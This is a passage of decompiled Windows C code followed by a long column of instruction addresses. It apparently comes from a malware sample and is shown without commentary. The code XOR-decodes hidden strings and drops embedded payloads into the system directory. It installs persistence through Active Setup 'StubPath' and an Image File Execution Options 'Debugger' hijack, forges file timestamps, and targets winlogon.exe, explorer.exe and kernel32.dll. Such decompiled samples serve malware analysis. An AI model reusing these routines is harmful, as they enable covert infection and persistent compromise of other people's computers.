																					RegSetValueExA(_t1300[0x2b], 0x407160, 0, 4, _t1176, 4);
																					RegSetValueExA(_t1300[0x2b], 0x40714a, 0, 4, _t1176, 4);
																					RegSetValueExA(_t1300[0x2b], 0x407135, 0, 4, _t1176, 4);
																					RegCloseKey(_t1300[0x26]);
																				}
																				_t781 = 0x4070c0;
																				while(1) {
																					__eflags = _t781 - 0x407134;
																					if(_t781 >= 0x407134) {
																						break;
																					}
																					 *_t781 =  *_t781 ^ 0x000000d4;
																					_t781 =  &(_t781[1]);
																				}
																				_t782 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t1275);
																				__eflags = _t782;
																				if(_t782 != 0) {
																					goto L634;
																				}
																				_t784 = E00401000(0x8000);
																				_t1300[0x1d] = 0x4000;
																				_t1276 = _t784;
																				_t785 = 0x407080;
																				_t1300[0x27] = 0x4000;
																				while(1) {
																					__eflags = _t785 - 0x4070a4;
																					if(_t785 >= 0x4070a4) {
																						break;
																					}
																					 *_t785 =  *_t785 ^ 0x000000d4;
																					_t785 =  &(_t785[1]);
																				}
																				_t1300[0xd] = 0;
																				while(1) {
																					_t381 =  &(_t1276[0x4000]); // 0x4000
																					_t1174 = _t381;
																					_t789 = RegEnumValueA(_t1300[0x2d], _t1300[0x13], _t1276,  &(_t1300[0x2b]), 0,  &(_t1300[0x1e]), _t381,  &(_t1300[0x1d]));
																					__eflags = _t789;
																					if(_t789 != 0) {
																						break;
																					}
																					__eflags = _t1300[0x1c] - 1;
																					if(_t1300[0x1c] == 1) {
																						_t791 = E00401311(_t1174, 0x40708d);
																						__eflags = _t791;
																						if(_t791 != 0) {
																							RegDeleteValueA(_t1300[0x27], _t1276);
																						}
																					}
																					_t376 =  &(_t1300[0xd]);
																					 *_t376 =  &(_t1300[0xd][1]);
																					__eflags =  *_t376;
																					_t1300[0x1d] = 0x4000;
																					_t1300[0x27] = 0x4000;
																				}
																				_t1175 =  &(_t1300[0x55a]);
																				_t794 = wsprintfA(_t1276, 0x407080, _t1175) + 1;
																				__eflags = _t794;
																				_t1300 =  &(_t1300[3]);
																				RegSetValueExA(_t1300[0x2b], _t1175, 0, 1, _t1276, _t794);
																				E00401029(_t1276);
																				RegCloseKey(_t1300[0x26]);
																				goto L634;
																			}
																			_t812 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t1300[0x26]));
																			__eflags = _t812;
																			if(_t812 != 0) {
																				goto L594;
																			}
																			goto L591;
																		}
																		__eflags = _t657 - 0xffffffff;
																		if(_t657 == 0xffffffff) {
																			goto L583;
																		}
																		L582:
																		WriteFile(_t1225, 0x408840, 0x5e00,  &(_t1300[0x28]), 0);
																		CloseHandle(_t1300[0x28]);
																		goto L584;
																	}
																	__eflags = _t654 - 0xffffffff;
																	if(_t654 != 0xffffffff) {
																		goto L582;
																	}
																	goto L580;
																}
																__eflags = _t820 + 1;
																if(_t820 + 1 != 0) {
																	L563:
																	WriteFile(_t1300[0x2c], 0x40e640, 0x1400,  &(_t1300[0x28]), 0);
																	__eflags = _t1300[3];
																	if(_t1300[3] != 0) {
																		SetFileTime(_t1300[0x2b],  &(_t1300[0x21]),  &(_t1300[0x22]),  &(_t1300[0x23]));
																	}
																	CloseHandle(_t1300[0x28]);
																	_t1300[9] = 1;
																	_push(0);
																	_push("winlogon.exe");
																	_t1178 =  &(_t1300[0x388]);
																	_t826 = E0040318D(_t1178);
																	_t1300 =  &(_t1300[3]);
																	__eflags = _t826;
																	if(_t826 == 0) {
																		_push(0);
																		_push("explorer.exe");
																		E0040318D(_t1178);
																		_t1300 =  &(_t1300[3]);
																	}
																	_push(0);
																	_push("kernel32.dll");
																	_push(_t1178);
																	L577:
																	E0040318D();
																	_t1300 =  &(_t1300[3]);
																	CreateFileA( &(_t1300[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
																	goto L578;
																}
																goto L575;
															}
															__eflags = _t646 + 1;
															if(_t646 + 1 != 0) {
																goto L563;
															}
															goto L572;
														}
														L569:
														_t1300[9] = 1;
														_push(0);
														_push("kernel32.dll");
														_push( &(_t1300[0x388]));
														goto L577;
													}
													__eflags = _t642 + 1;
													if(_t642 + 1 == 0) {
														goto L568;
													}
													goto L563;
												}
												_t1277 =  &(_t1300[0x16a]);
												_t834 = GetTempFileNameA(_t1159, "tmp", 0, _t1277);
												__eflags = _t834;
												if(_t834 == 0) {
													goto L561;
												}
												_t835 = CreateFileA(_t1277, 0x40000000, 0, 0, 2, 0x80, 0);
												_t1300[0x28] = _t835;
												__eflags = _t835;
												if(_t835 == 0) {
													goto L561;
												}
												__eflags = _t835 + 1;
												if(_t835 + 1 == 0) {
													goto L561;
												}
												L558:
												WriteFile(_t1300[0x2c], _t1300[8], _t1296,  &(_t1300[0x28]), 0);
												CloseHandle(_t1300[0x28]);
												CreateFileA( &(_t1300[0x170]), 0x80000000, 1, 0, 3, 0, 0);
												_t1278 =  &(_t1300[0x1ee]);
												_t1249 =  &(_t1300[0x162]);
												_t1211 =  &(_t1300[0x278]);
												while(1) {
													__eflags = _t1278 - _t1211;
													if(_t1278 >= _t1211) {
														goto L561;
													}
													_t843 = _t1300[0x1ee] & 0x000000ff ^  *_t1249;
													_t1249 =  &(_t1249[0]);
													 *_t1278 = _t843;
													_t1278 =  &(_t1278[1]);
												}
												goto L561;
											}
											_t1279 =  &(_t1300[0x16a]);
											_push(_t1279);
											_push(0);
											_push(0x411040);
											_push(_t1158);
											L00405E90();
											__eflags = _t636;
											if(_t636 == 0) {
												goto L553;
											}
											_push(0);
											_push(0x80);
											_push(2);
											_push(0);
											_push(0);
											_push(0x40000000);
											_push(_t1279);
											L00405DB0();
											_t1300[0x28] = _t636;
											__eflags = _t636;
											if(_t636 == 0) {
												goto L553;
											}
											__eflags = _t636 + 1;
											if(_t636 + 1 != 0) {
												goto L558;
											}
											goto L553;
										}
										RegDeleteValueA(_t629, "SubshellState");
										RegCloseKey(_t1300[0x26]);
										_t1280 =  &(_t1300[0x1ee]);
										_t1250 =  &(_t1300[0x162]);
										_t1212 =  &(_t1300[0x278]);
										while(1) {
											__eflags = _t1280 - _t1212;
											if(_t1280 >= _t1212) {
												break;
											}
											_t870 = _t1300[0x1ee] & 0x000000ff ^  *_t1280;
											_t1280 =  &(_t1280[0]);
											 *_t1250 = _t870;
											_t1250 =  &(_t1250[1]);
										}
										_push( *0x4120b0);
										_t849 =  &(_t1300[0x163]);
										_push(_t849);
										L00405E50();
										__eflags = _t849;
										if(_t849 != 0) {
											L528:
											_t1179 =  &(_t1300[0x16b]);
											SetFileAttributesA(_t1179, 0x80);
											DeleteFileA(_t1179);
											goto L542;
										}
										_push( &(_t1300[0x55a]));
										_t853 =  &(_t1300[0x1ac]);
										_push(_t853);
										L00405E50();
										__eflags = _t853;
										if(_t853 == 0) {
											_t855 = CreateFileA( &(_t1300[0x170]), 0x80000000, 1, 0, 3, 0, 0);
											_t1300[0x28] = _t855;
											__eflags = _t855;
											if(_t855 == 0) {
												goto L528;
											}
											__eflags = _t855 - 0xffffffff;
											if(_t855 == 0xffffffff) {
												goto L528;
											}
											_t856 = GetFileSize(_t855, 0);
											_t1300[0x1d] = _t856;
											__eflags = _t856 - _t1296;
											if(_t856 == _t1296) {
												_t859 = E00401000(_t1296);
												_t1281 = _t859;
												ReadFile(_t1300[0x2c], _t859, _t1296,  &(_t1300[0x28]), 0);
												_t1180 = _t1300[0x1d];
												_t1251 = _t1281;
												_t1264 = _t1300[5];
												__eflags = _t1281 - _t1281 + _t1180;
												while(__eflags < 0) {
													_t1213 =  *_t1251 & 0x000000ff;
													__eflags = _t1300[0x162] - ( *_t1264 & 0x000000ff);
													if(__eflags == 0) {
														__eflags = _t1213;
													}
													if(__eflags == 0) {
														_t1251 =  &(_t1251[1]);
														_t1264 =  &(_t1264[1]);
														__eflags = _t1251 - _t1281 + _t1180;
														continue;
													}
													E00401029(_t1281);
													goto L532;
												}
												E00401029(_t1281);
												goto L561;
											}
											L532:
											CloseHandle(_t1300[0x28]);
										}
										goto L528;
									}
									_t1181 =  &(_t1300[0x3cb]);
									_t871 = GetSystemDirectoryA(_t1181, 0x104);
									_push( *0x412090);
									_push(0x41103e);
									_push(_t1181);
									L00405E30();
									_push(_t871);
									L00405E30();
									_t872 = 0x407260;
									while(1) {
										__eflags = _t872 - 0x407286;
										if(_t872 >= 0x407286) {
											break;
										}
										 *_t872 =  *_t872 ^ 0x000000d4;
										_t872 =  &(_t872[1]);
									}
									_t873 = CreateMutexA(0, 0, "h`r@");
									_t1300[0x28] = _t873;
									__eflags = _t873;
									if(_t873 == 0) {
										Sleep(0x7d0);
									} else {
										WaitForSingleObject(_t873, 0x2710);
										CloseHandle(_t1300[0x28]);
									}
									_t1182 =  &(_t1300[0x3cb]);
									SetFileAttributesA(_t1182, 0x80);
									_t875 = CreateFileA(_t1182, 0x40000000, 0, 0, 2, 0x80, 0);
									_t1300[0x28] = _t875;
									__eflags = _t875;
									if(_t875 == 0) {
										L521:
										RegCloseKey(_t1300[0x26]);
										RegDeleteKeyA(0x80000001,  &(_t1300[0x40e]));
										goto L522;
									}
									__eflags = _t875 - 0xffffffff;
									if(_t875 == 0xffffffff) {
										goto L521;
									}
									WriteFile(_t875, 0x4072a0, 0x800,  &(_t1300[0x28]), 0);
									_t880 = E004010B2();
									_t1300[6] = _t880;
									__eflags = _t880;
									if(_t880 == 0) {
										_t1300[6] = 0xc6;
									}
									_t882 = E00401000(_t1296 + 0x64);
									 *((char*)(_t882 + _t1296)) = 0;
									_t1265 = _t882;
									_t1282 = _t882;
									_t1253 = _t1300[5];
									_t883 = _t882 + _t1296;
									while(1) {
										__eflags = _t1282 - _t883;
										if(_t1282 >= _t883) {
											break;
										}
										_t908 = _t1300[6] & 0x000000ff ^  *_t1253;
										_t1253 =  &(_t1253[0]);
										 *_t1282 = _t908;
										_t1282 = _t1282 + 1;
										_t883 = _t1265 + _t1296;
									}
									_t884 =  &(_t1300[0x55a]);
									_t1183 = _t1265 + _t1296;
									_push(_t884);
									L00405E40();
									_t1283 = _t1183 +  &(_t884[1]);
									__eflags = _t1283 - _t1183 + 0x64;
									while(__eflags < 0) {
										 *_t1283 = E004010B2();
										_t1283 = _t1283 + 1;
										_t250 = _t1296 + 0x64; // 0x64
										__eflags = _t1283 - _t1265 + _t250;
									}
									 *(_t1265 + _t1296 + 1) = _t1296;
									_t1185 = _t1265 + _t1296;
									_push( &(_t1300[0x55a]));
									_t1284 = _t1185;
									_push( &(_t1185[1]));
									L00405E20();
									_t887 =  &(_t1185[0x19]);
									while(1) {
										__eflags = _t1284 - _t887;
										if(_t1284 >= _t887) {
											break;
										}
										 *_t1284 =  *_t1284 ^ _t1300[6] & 0x000000ff;
										_t1284 =  &(_t1284[0]);
										_t259 = _t1296 + 0x64; // 0x64
										_t887 = _t1265 + _t259;
									}
									WriteFile(_t1300[0x2c], _t1265, _t1296 + 0x64,  &(_t1300[0x28]), 0);
									E00401029(_t1265);
									__eflags = _t1300[3];
									if(_t1300[3] != 0) {
										SetFileTime(_t1300[0x2b],  &(_t1300[0x21]),  &(_t1300[0x22]),  &(_t1300[0x23]));
									}
									CloseHandle(_t1300[0x28]);
									_t1186 =  &(_t1300[0x3d0]);
									CreateFileA(_t1186, 0x80000000, 1, 0, 3, 0, 0);
									E00401251(_t1300[0x26]);
									_t1300[0x27] = 1;
									_t897 = RegSetValueExA(_t1300[0x2b], "IsInstalled", 0, 4,  &(_t1300[0x28]), 4);
									_push(_t1186);
									L00405E40();
									_t898 = _t897 + 1;
									__eflags = _t898;
									RegSetValueExA(_t1300[0x2b], "StubPath", 0, 1, _t1186, _t898);
									_t1300[0xa] = 1;
									goto L521;
								}
								__eflags =  *((char*)(_t1299 + 0x1e8));
								if( *((char*)(_t1299 + 0x1e8)) != 0) {
									_push(_t1156);
									_t911 = _t1299 + 0x1bc;
									_push(_t911);
									L00405E20();
									while(1) {
										_t1187 = _t1299 + 0x1b8;
										_push(_t1187);
										L00405E40();
										__eflags = _t911 - 0xf;
										if(_t911 > 0xf) {
											goto L491;
										}
										_t911 = _t1299 + 0x1e8;
										_push(_t911);
										_push(_t1187);
										L00405E30();
									}
									goto L491;
								}
								goto L487;
							}
							_t913 = RegCreateKeyA(0x80000002, 0x408720, _t1299 + 0x98);
							__eflags = _t913;
							if(_t913 != 0) {
								goto L485;
							}
							_t1188 = _t1299 + 0x123c;
							_t914 = GetSystemDirectoryA(_t1188, 0x104);
							_push( *0x4120a0);
							_push(0x41103e);
							_push(_t1188);
							L00405E30();
							_push(_t914);
							L00405E30();
							_t915 = 0x407ae0;
							while(1) {
								__eflags = _t915 - 0x407b06;
								if(_t915 >= 0x407b06) {
									break;
								}
								 *_t915 =  *_t915 ^ 0x000000d4;
								_t915 =  &(_t915[1]);
							}
							_t916 = CreateMutexA(0, 0, 0x407ae0);
							 *(_t1299 + 0xa0) = _t916;
							__eflags = _t916;
							if(_t916 == 0) {
								Sleep(0x7d0);
							} else {
								WaitForSingleObject(_t916, 0x2710);
								CloseHandle( *(_t1299 + 0xa0));
							}
							_t1189 = _t1299 + 0x123c;
							SetFileAttributesA(_t1189, 0x80);
							_t918 = CreateFileA(_t1189, 0x40000000, 0, 0, 2, 0x80, 0);
							 *(_t1299 + 0xa0) = _t918;
							__eflags = _t918;
							if(_t918 == 0) {
								L484:
								RegCloseKey( *(_t1299 + 0x98));
								goto L485;
							}
							__eflags = _t918 - 0xffffffff;
							if(_t918 == 0xffffffff) {
								goto L484;
							}
							WriteFile(_t918, 0x407b20, 0xc00, _t1299 + 0xa0, 0);
							_t921 = E004010B2();
							 *(_t1299 + 0x1b) = _t921;
							__eflags = _t921;
							if(_t921 == 0) {
								 *(_t1299 + 0x1b) = 0x66;
							}
							_t923 = E00401000(_t1296 + 0x64);
							 *((char*)(_t923 + _t1296)) = 0;
							_t1266 = _t923;
							_t1285 = _t923;
							_t1256 =  *(_t1299 + 0x14);
							_t924 = _t923 + _t1296;
							while(1) {
								__eflags = _t1285 - _t924;
								if(_t1285 >= _t924) {
									break;
								}
								_t948 =  *(_t1299 + 0x1b) & 0x000000ff ^  *_t1256;
								_t1256 =  &(_t1256[0]);
								 *_t1285 = _t948;
								_t1285 = _t1285 + 1;
								_t924 = _t1266 + _t1296;
							}
							_t925 = _t1299 + 0x1568;
							_t1190 = _t1266 + _t1296;
							_push(_t925);
							L00405E40();
							_t1286 = _t1190 + _t925 + 5;
							__eflags = _t1286 - _t1190 + 0x64;
							while(__eflags < 0) {
								 *_t1286 = E004010B2();
								_t1286 = _t1286 + 1;
								_t178 = _t1296 + 0x64; // 0x64
								__eflags = _t1286 - _t1266 + _t178;
							}
							 *(_t1266 + _t1296 + 1) = _t1296;
							_t1192 = _t1266 + _t1296;
							_push(_t1299 + 0x1568);
							_t1287 = _t1192;
							_push( &(_t1192[1]));
							L00405E20();
							_t928 =  &(_t1192[0x19]);
							while(1) {
								__eflags = _t1287 - _t928;
								if(_t1287 >= _t928) {
									break;
								}
								 *_t1287 =  *_t1287 ^  *(_t1299 + 0x1b) & 0x000000ff;
								_t1287 =  &(_t1287[0]);
								_t187 = _t1296 + 0x64; // 0x64
								_t928 = _t1266 + _t187;
							}
							WriteFile( *(_t1299 + 0xb0), _t1266, _t1296 + 0x64, _t1299 + 0xa0, 0);
							E00401029(_t1266);
							__eflags =  *(_t1299 + 0xc);
							if( *(_t1299 + 0xc) != 0) {
								SetFileTime( *(_t1299 + 0xac), _t1299 + 0x84, _t1299 + 0x88, _t1299 + 0x8c);
							}
							CloseHandle( *(_t1299 + 0xa0));
							_t1193 = _t1299 + 0x1250;
							CreateFileA(_t1193, 0x80000000, 1, 0, 3, 0, 0);
							RegDeleteValueA( *(_t1299 + 0x9c), "Debugger");
							_t937 = E00401251( *(_t1299 + 0x98));
							_push(_t1193);
							L00405E40();
							_t938 = _t937 + 1;
							__eflags = _t938;
							RegSetValueExA( *(_t1299 + 0xac), "Debugger", 0, 1, _t1193, _t938);
							 *(_t1299 + 0x2c) = 1;
							goto L484;
						}
						__eflags = _t597 - 0xffffffff;
						if(_t597 == 0xffffffff) {
							goto L452;
						}
						_t1296 = GetFileSize(_t597, 0);
						 *(_t1299 + 0x14) = E00401000(_t951);
						ReadFile( *(_t1299 + 0xb0),  *(_t1299 + 0x20), _t1296, _t1299 + 0xa0, 0);
						CloseHandle( *(_t1299 + 0xa0));
						goto L453;
					}
					 *(_t1299 + 0x9c) = GetCurrentProcessId();
					_t1205 = 0;
					__eflags = 0;
					 *(_t1299 + 0x9e8) = 0x128;
					_t1138 = Process32First( *(_t1299 + 0xa4), _t1299 + 0x9e8);
					while(1) {
						__eflags = _t1138;
						if(_t1138 == 0) {
							break;
						}
						__eflags =  *((intOrPtr*)(_t1299 + 0x9f0)) -  *(_t1299 + 0x9c);
						if( *((intOrPtr*)(_t1299 + 0x9f0)) ==  *(_t1299 + 0x9c)) {
							_t1205 = OpenProcess(0x100000, 0,  *(_t1299 + 0xa00));
							break;
						}
						_t1138 = Process32Next( *(_t1299 + 0xa4), _t1299 + 0x9e8);
					}
					CloseHandle( *(_t1299 + 0xa0));
					__eflags = _t1205;
					if(_t1205 == 0) {
						goto L447;
					}
					WaitForSingleObject(_t1205, 0xffffffff);
					CloseHandle(_t1205);
					_t1206 = _t1299 + 0xb28;
					GetStartupInfoA(_t1206);
					CreateProcessA(_t1299 + 0x158c, 0, 0, 0, 0, 0, 0, 0, _t1206, _t1299 + 0xb18);
					L446:
					goto L447;
				}
			}

0x00403478
0x0040347d
0x00403484
0x00403487
0x00403487
0x00403490
0x00403495
0x00403497
0x0040349d
0x0040349d
0x004034ae
0x004034b3
0x004034b8
0x004034bd
0x004034c2
0x004034c4
0x004035a3
0x004035aa
0x004035af
0x004037c7
0x004037c7
0x004037cc
0x00000000
0x00000000
0x004037ce
0x004037ce
0x004037d1
0x004037d1
0x004037df
0x004037e1
0x004037e1
0x004037e7
0x00000000
0x00000000
0x004037e9
0x004037e9
0x004037ec
0x004037f2
0x004037fd
0x00403807
0x00403807
0x0040380d
0x00403814
0x00403815
0x00403817
0x0040381c
0x00403823
0x00403832
0x00403832
0x00403834
0x00403839
0x0040383f
0x0040383f
0x00403844
0x00000000
0x00000000
0x00403846
0x00403849
0x00403849
0x00403851
0x00403856
0x00403858
0x0040385a
0x00403880
0x0040388a
0x0040388a
0x0040388f
0x0040388f
0x00403894
0x00000000
0x00000000
0x00403896
0x00403899
0x00403899
0x004038a1
0x004038a6
0x004038a8
0x004038aa
0x004038d0
0x004038da
0x004038da
0x004038df
0x004038df
0x004038e4
0x00000000
0x00000000
0x004038e6
0x004038e9
0x004038e9
0x004038ec
0x004038f1
0x004038f1
0x004038f6
0x00000000
0x00000000
0x004038f8
0x004038f8
0x004038fb
0x004038fb
0x004038fe
0x00403903
0x00403903
0x00403908
0x00000000
0x00000000
0x0040390a
0x0040390a
0x0040390d
0x0040390d
0x00403910
0x00403915
0x00403915
0x0040391a
0x00000000
0x00000000
0x0040391c
0x0040391c
0x0040391f
0x0040391f
0x00403922
0x00403927
0x00403927
0x0040392c
0x00000000
0x00000000
0x0040392e
0x0040392e
0x00403931
0x00403931
0x00403934
0x00403939
0x00403939
0x0040393e
0x00000000
0x00000000
0x00403940
0x00403940
0x00403943
0x00403943
0x0040394b
0x00403950
0x00403952
0x00403954
0x00403a06
0x00403a10
0x00403a10
0x00403a15
0x00403a15
0x00403a1a
0x00000000
0x00000000
0x00403a1c
0x00403a1f
0x00403a1f
0x00403a22
0x00403a27
0x00403a27
0x00403a2c
0x00000000
0x00000000
0x00403a2e
0x00403a2e
0x00403a31
0x00403a31
0x00403a34
0x00403a39
0x00403a39
0x00403a3e
0x00000000
0x00000000
0x00403a40
0x00403a40
0x00403a43
0x00403a43
0x00403a46
0x00403a4b
0x00403a4b
0x00403a50
0x00000000
0x00000000
0x00403a52
0x00403a52
0x00403a55
0x00403a55
0x00403a58
0x00403a5d
0x00403a5d
0x00403a62
0x00000000
0x00000000
0x00403a64
0x00403a64
0x00403a67
0x00403a67
0x00403a6a
0x00403a6f
0x00403a6f
0x00403a74
0x00000000
0x00000000
0x00403a76
0x00403a76
0x00403a79
0x00403a79
0x00403a7c
0x00403a81
0x00403a81
0x00403a86
0x00000000
0x00000000
0x00403a88
0x00403a88
0x00403a8b
0x00403a8b
0x00403a8e
0x00403a93
0x00403a93
0x00403a98
0x00000000
0x00000000
0x00403a9a
0x00403a9a
0x00403a9d
0x00403a9d
0x00403aa0
0x00403aa5
0x00403aa5
0x00403aaa
0x00000000
0x00000000
0x00403aac
0x00403aac
0x00403aaf
0x00403aaf
0x00403ab2
0x00403ab7
0x00403ab7
0x00403abc
0x00000000
0x00000000
0x00403abe
0x00403abe
0x00403ac1
0x00403ac1
0x00403ac4
0x00403ac9
0x00403ac9
0x00403ace
0x00000000
0x00000000
0x00403ad0
0x00403ad0
0x00403ad3
0x00403ad3
0x00403ad6
0x00403adb
0x00403adb
0x00403ae0
0x00000000
0x00000000
0x00403ae2
0x00403ae2
0x00403ae5
0x00403ae5
0x00403ae8
0x00403aed
0x00403aed
0x00403af2
0x00000000
0x00000000
0x00403af4
0x00403af4
0x00403af7
0x00403af7
0x00403afa
0x00403aff
0x00403aff
0x00403b04
0x00000000
0x00000000
0x00403b06
0x00403b06
0x00403b09
0x00403b09
0x00403b0c
0x00403b11
0x00403b11
0x00403b16
0x00000000
0x00000000
0x00403b18
0x00403b18
0x00403b1b
0x00403b1b
0x00403b1e
0x00403b23
0x00403b23
0x00403b28
0x00000000
0x00000000
0x00403b2a
0x00403b2a
0x00403b2d
0x00403b2d
0x00403b30
0x00403b35
0x00403b35
0x00403b3a
0x00000000
0x00000000
0x00403b3c
0x00403b3c
0x00403b3f
0x00403b3f
0x00403b42
0x00403b47
0x00403b47
0x00403b4c
0x00000000
0x00000000
0x00403b4e
0x00403b4e
0x00403b51
0x00403b51
0x00403b54
0x00403b59
0x00403b59
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b60
0x00403b63
0x00403b63
0x00403b66
0x00403b6b
0x00403b6b
0x00403b70
0x00000000
0x00000000
0x00403b72
0x00403b72
0x00403b75
0x00403b75
0x00403b78
0x00403b7d
0x00403b7d
0x00403b82
0x00000000
0x00000000
0x00403b84
0x00403b84
0x00403b87
0x00403b87
0x00403b8a
0x00403b8f
0x00403b8f
0x00403b94
0x00000000
0x00000000
0x00403b96
0x00403b96
0x00403b99
0x00403b99
0x00403b9c
0x00403ba1
0x00403ba1
0x00403ba6
0x00000000
0x00000000
0x00403ba8
0x00403ba8
0x00403bab
0x00403bab
0x00403bae
0x00403bb3
0x00403bb3
0x00403bb8
0x00000000
0x00000000
0x00403bba
0x00403bba
0x00403bbd
0x00403bbd
0x00403bc0
0x00403bc5
0x00403bc5
0x00403bca
0x00000000
0x00000000
0x00403bcc
0x00403bcc
0x00403bcf
0x00403bcf
0x00403bd2
0x00403bd7
0x00403bd7
0x00403bdc
0x00000000
0x00000000
0x00403bde
0x00403bde
0x00403be1
0x00403be1
0x00403be4
0x00403be9
0x00403be9
0x00403bee
0x00000000
0x00000000
0x00403bf0
0x00403bf0
0x00403bf3
0x00403bf3
0x00403bf6
0x00403bfb
0x00403bfb
0x00403c00
0x00000000
0x00000000
0x00403c02
0x00403c02
0x00403c05
0x00403c05
0x00403c08
0x00403c0d
0x00403c0d
0x00403c12
0x00000000
0x00000000
0x00403c14
0x00403c14
0x00403c17
0x00403c17
0x00403c1a
0x00403c1f
0x00403c1f
0x00403c24
0x00000000
0x00000000
0x00403c26
0x00403c26
0x00403c29
0x00403c29
0x00403c2c
0x00403c31
0x00403c31
0x00403c36
0x00000000
0x00000000
0x00403c38
0x00403c38
0x00403c3b
0x00403c3b
0x00403c3e
0x00403c43
0x00403c43
0x00403c48
0x00000000
0x00000000
0x00403c4a
0x00403c4a
0x00403c4d
0x00403c4d
0x00403c50
0x00403c55
0x00403c55
0x00403c5a
0x00000000
0x00000000
0x00403c5c
0x00403c5c
0x00403c5f
0x00403c5f
0x00403c62
0x00403c67
0x00403c67
0x00403c6c
0x00000000
0x00000000
0x00403c6e
0x00403c6e
0x00403c71
0x00403c71
0x00403c74
0x00403c79
0x00403c79
0x00403c7e
0x00000000
0x00000000
0x00403c80
0x00403c80
0x00403c83
0x00403c83
0x00403c86
0x00403c8b
0x00403c8b
0x00403c90
0x00000000
0x00000000
0x00403c92
0x00403c92
0x00403c95
0x00403c95
0x00403c98
0x00403c9d
0x00403c9d
0x00403ca2
0x00000000
0x00000000
0x00403ca4
0x00403ca4
0x00403ca7
0x00403ca7
0x00403caa
0x00403caf
0x00403caf
0x00403cb4
0x00000000
0x00000000
0x00403cb6
0x00403cb6
0x00403cb9
0x00403cb9
0x00403cbc
0x00403cc1
0x00403cc1
0x00403cc6
0x00000000
0x00000000
0x00403cc8
0x00403cc8
0x00403ccb
0x00403ccb
0x00403cce
0x00403cd3
0x00403cd3
0x00403cd8
0x00000000
0x00000000
0x00403cda
0x00403cda
0x00403cdd
0x00403cdd
0x00403ce0
0x00403ce5
0x00403ce5
0x00403cea
0x00000000
0x00000000
0x00403cec
0x00403cec
0x00403cef
0x00403cef
0x00403cf2
0x00403cf7
0x00403cf7
0x00403cfc
0x00000000
0x00000000
0x00403cfe
0x00403cfe
0x00403d01
0x00403d01
0x00403d04
0x00403d09
0x00403d09
0x00403d0e
0x00000000
0x00000000
0x00403d10
0x00403d10
0x00403d13
0x00403d13
0x00403d16
0x00403d1b
0x00403d1b
0x00403d20
0x00000000
0x00000000
0x00403d22
0x00403d22
0x00403d25
0x00403d25
0x00403d28
0x00403d2d
0x00403d2d
0x00403d32
0x00000000
0x00000000
0x00403d34
0x00403d34
0x00403d37
0x00403d37
0x00403d3a
0x00403d3f
0x00403d3f
0x00403d44
0x00000000
0x00000000
0x00403d46
0x00403d46
0x00403d49
0x00403d49
0x00403d4c
0x00403d51
0x00403d51
0x00403d56
0x00000000
0x00000000
0x00403d58
0x00403d58
0x00403d5b
0x00403d5b
0x00403d5e
0x00403d63
0x00403d63
0x00403d68
0x00000000
0x00000000
0x00403d6a
0x00403d6a
0x00403d6d
0x00403d6d
0x00403d70
0x00403d75
0x00403d75
0x00403d7a
0x00000000
0x00000000
0x00403d7c
0x00403d7c
0x00403d7f
0x00403d7f
0x00403d82
0x00403d87
0x00403d87
0x00403d8c
0x00000000
0x00000000
0x00403d8e
0x00403d8e
0x00403d91
0x00403d91
0x00403d94
0x00403d99
0x00403d99
0x00403d9e
0x00000000
0x00000000
0x00403da0
0x00403da0
0x00403da3
0x00403da3
0x00403da6
0x00403dab
0x00403dab
0x00403db0
0x00000000
0x00000000
0x00403db2
0x00403db2
0x00403db5
0x00403db5
0x00403db8
0x00403dbd
0x00403dbd
0x00403dc2
0x00000000
0x00000000
0x00403dc4
0x00403dc4
0x00403dc7
0x00403dc7
0x00403dca
0x00403dcf
0x00403dcf
0x00403dd4
0x00000000
0x00000000
0x00403dd6
0x00403dd6
0x00403dd9
0x00403dd9
0x00403ddc
0x00403de1
0x00403de1
0x00403de6
0x00000000
0x00000000
0x00403de8
0x00403de8
0x00403deb
0x00403deb
0x00403dee
0x00403df3
0x00403df3
0x00403df8
0x00000000
0x00000000
0x00403dfa
0x00403dfa
0x00403dfd
0x00403dfd
0x00403e05
0x00403e05
0x00403e0a
0x00000000
0x00000000
0x00403e0c
0x00403e0c
0x00403e0d
0x00403e0d
0x00403e17
0x00403e17
0x00403e1c
0x00000000
0x00000000
0x00403e1e
0x00403e1e
0x00403e1f
0x00403e1f
0x00403e29
0x00403e29
0x00403e2e
0x00000000
0x00000000
0x00403e30
0x00403e30
0x00403e31
0x00403e31
0x00403e4d
0x00403e52
0x00403e59
0x00403e5b
0x00403e5d
0x00403e60
0x00403e69
0x00403e86
0x00403e92
0x00403e97
0x00403e9e
0x00403ea5
0x00403eaa
0x00403eaa
0x00403e9e
0x00403e60
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00000000
0x00000000
0x00403ebe
0x00403ec1
0x00403ec1
0x00403ec4
0x00403ec9
0x00403ec9
0x00403ece
0x00000000
0x00000000
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed3
0x00403ed6
0x00403ee2
0x00403ef3
0x00403f09
0x00403f1f
0x00403f35
0x00403f3a
0x00403f46
0x00403f4b
0x00403f51
0x00403f5d
0x00403f62
0x00403f63
0x00403f68
0x00403f6a
0x00403f6a
0x00403f70
0x00403f74
0x00403f79
0x00403f79
0x00403f7e
0x00000000
0x00000000
0x00403f80
0x00403f80
0x00403f83
0x00403f83
0x00403f86
0x00403f8b
0x00403f8b
0x00403f90
0x00000000
0x00000000
0x00403f92
0x00403f92
0x00403f95
0x00403f95
0x00403f98
0x00403f9d
0x00403f9d
0x00403fa2
0x00000000
0x00000000
0x00403fa4
0x00403fa4
0x00403fa7
0x00403fa7
0x00403faa
0x00403fb2
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fdf
0x00000000
0x00000000
0x00403fe5
0x00403fea
0x00403fef
0x0040426e
0x00404273
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x00000000
0x00000000
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
